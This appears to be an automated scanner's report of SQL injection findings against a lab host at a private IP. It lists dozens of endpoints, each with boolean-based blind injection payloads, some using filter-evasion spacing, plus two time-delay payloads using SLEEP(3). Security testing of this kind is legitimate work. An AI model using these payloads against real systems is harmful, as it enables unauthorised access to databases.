Target: http://192.168.42.133 (GET)

---
URL:http://192.168.42.133/sqli/example1.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example5.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	18980=18980
	and	87280=87280
	or	24005=24005#
	and	45889=45890
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example3.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '/**/and/**/'541'='541
'/**/and/**/'28195'='28195
'/**/or/**/81677=81677#
'/**/and/**/'94730'='94731
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example6.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	18980=18980
	and	87280=87280
	or	24005=24005#
	and	45889=45890
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example4.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 	and	18980=18980
	and	87280=87280
	or	24005=24005#
	and	45889=45890
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example7.php (GET)
VulnName: blind sqli
Query: {'id': '2'}
Payload: 
and
78832=78832

and
6607=6607

or
15169=15169#

and
82137=82138
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/xml/example2.php (GET)
VulnName: blind sqli
Query: {'name': 'hacker'}
Payload: '+and+'99511'='99511
'+and+'66283'='66283
'+or+25060=25060#
'+and+'64316'='64317
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example100.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example101.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example102.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example103.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example104.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example105.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example106.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example107.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example108.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example110.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example109.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example112.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example111.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example113.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example114.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example117.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example115.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example116.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example118.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example119.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example120.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example122.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example121.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example123.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example124.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example125.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example126.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example127.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example128.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example129.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example131.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example132.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example130.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example133.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example134.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example135.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example136.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example138.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example137.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example139.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example140.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example141.php (GET)
VulnName: blind sqli
Query: {'name': 'root'}
Payload: '	and	'59083'='59083
'	and	'89893'='89893
'	or	79725=79725#
'	and	'95430'='95431
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example8.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload: ` or SLEEP(3);-- 
Advice: use orm
Database: unknown
---
---
URL:http://192.168.42.133/sqli/example9.php (GET)
VulnName: time delay sqli vuln
Query: {'order': 'name'}
Payload:  or SLEEP(3);-- 
Advice: use orm
Database: unknown
---